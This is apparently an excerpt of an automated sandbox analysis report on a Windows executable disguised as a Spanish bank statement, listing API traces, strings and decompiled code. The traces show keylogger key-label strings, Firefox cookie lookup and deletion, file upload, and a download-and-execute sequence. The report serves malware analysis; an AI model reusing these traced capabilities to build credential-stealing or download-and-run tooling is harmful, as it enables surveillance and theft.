                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,FileSize: ,00000000,?,?,?,?), ref: 00403608
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                        • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                        • API String ID: 2510920776-3166941866
                                        • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                        • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                        • getenv.MSVCRT ref: 00407558
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                        • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 2907366228-432212279
                                        • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                        • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                        • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                        • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
                                        				char _v5;
                                        				void* _v12;
                                        				char _v13;
                                        				char _v14;
                                        				void* _v32;
                                        				char _v48;
                                        				short _v64;
                                        				char _v80;
                                        				char _v96;
                                        				void* _v112;
                                        				char _v128;
                                        				char _v144;
                                        				struct _WIN32_FIND_DATAW _v736;
                                        				char* _t73;
                                        				struct _WIN32_FIND_DATAW* _t75;
                                        				void* _t79;
                                        				void* _t81;
                                        				signed int _t96;
                                        				intOrPtr* _t137;
                                        				void* _t139;
                                        				void* _t141;
                                        				signed int _t145;
                                        
                                        				_t137 = __ecx;
                                        				_t60 =  &_v5;
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                        				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
                                        				L00414146();
                                        				_t141 = _t139 + 0x1c;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
                                        				_v12 = FindFirstFileW( &_v64,  &_v64);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				if(_v12 == 0xffffffff) {
                                        					L11:
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					return 1;
                                        				}
                                        				while(FindNextFileW(_v12,  &_v736) != 0) {
                                        					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
                                        						L0041414C();
                                        						L00414152();
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                        						_t141 = _t141 + 0x18;
                                        						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
                                        						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					}
                                        					_t71 =  &(_v736.cFileName);
                                        					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
                                        					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
                                        					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
                                        					_t141 = _t141 + 0x10;
                                        					_t73 =  &_a20;
                                        					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
                                        					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
                                        						L8:
                                        						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        						continue;
                                        					} else {
                                        						_t75 =  &_v736;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
                                        						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						_t145 = _t141 - 0x10;
                                        						_t96 = _t145;
                                        						_t79 = E00412855( &_v80,  &_v128,  &_a4);
                                        						_t80 =  &_v96;
                                        						L00414140();
                                        						L00414140();
                                        						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
                                        						_t141 = _t145 + 0x30;
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
                                        							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        							return 0;
                                        						}
                                        						goto L8;
                                        					}
                                        				}
                                        				FindClose(_v12);
                                        				goto L11;
                                        			}

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                        • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                        • wcscmp.MSVCRT ref: 00404CCA
                                        • wcscmp.MSVCRT ref: 00404CE2
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                          • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                        • String ID:
                                        • API String ID: 1504175218-0
                                        • Opcode ID: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                        • Opcode Fuzzy Hash: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,745E73F0,?), ref: 0040616A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                        • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                        • API String ID: 4257247948-3968991301
                                        • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                        • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                        • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                        • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                        • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                        • free.MSVCRT(?,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,?), ref: 0040D643
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
